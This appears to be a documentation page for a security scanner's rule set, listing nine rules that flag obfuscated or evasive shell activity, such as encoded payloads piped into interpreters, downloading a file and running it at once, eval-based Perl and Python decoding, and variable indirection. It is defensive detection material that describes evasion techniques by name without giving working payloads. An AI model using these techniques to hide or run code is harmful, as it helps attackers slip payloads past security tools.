Encoding, Obfuscation & Evasion
Detects obfuscated payloads, encoded commands, and evasion techniques designed to bypass security scanners
9 rules in obfuscation_evasion.yml
HIGH: 8 | MEDIUM: 1
| Rule ID | Severity | Title | Description | Refs |
|---|---|---|---|---|
base32_ | HIGH | Base32/Base16 Encoded Payload | base32 / base16 -d output is piped into sh/bash/python/perl. Encoding hides the payload from string-based detection until it reaches the interpreter. | |
curl_ | HIGH | Downloaded File Execution | Downloads a file and immediately executes it, bypassing inspection | |
env_ | HIGH | Environment Variable Constructed Command | Constructs a command from multiple environment variables to evade detection | |
gzip_ | HIGH | Compressed Payload Execution | Decompresses and executes a payload to evade pattern detection | |
hex_ | HIGH | Hex-Encoded Payload Execution | Decodes and executes hex-encoded payloads to evade pattern detection | |
perl_ | HIGH | Obfuscated Perl Code Execution | perl -e expression mixes eval with pack/unpack/chr or MIME::Base64::decode_base64. The shape decodes a hidden payload at runtime - a textbook AV evasion idiom. | |
python_ | HIGH | Obfuscated Python Code Execution | Executes obfuscated Python code using exec(), compile(), or import tricks | |
variable_ | HIGH | Variable Indirection for Command Evasion | Uses shell variable concatenation or indirection to construct commands at runtime, evading static detection | |
rev_ | MEDIUM | Reversed String Evasion | Uses the rev command to reverse obfuscated strings at runtime |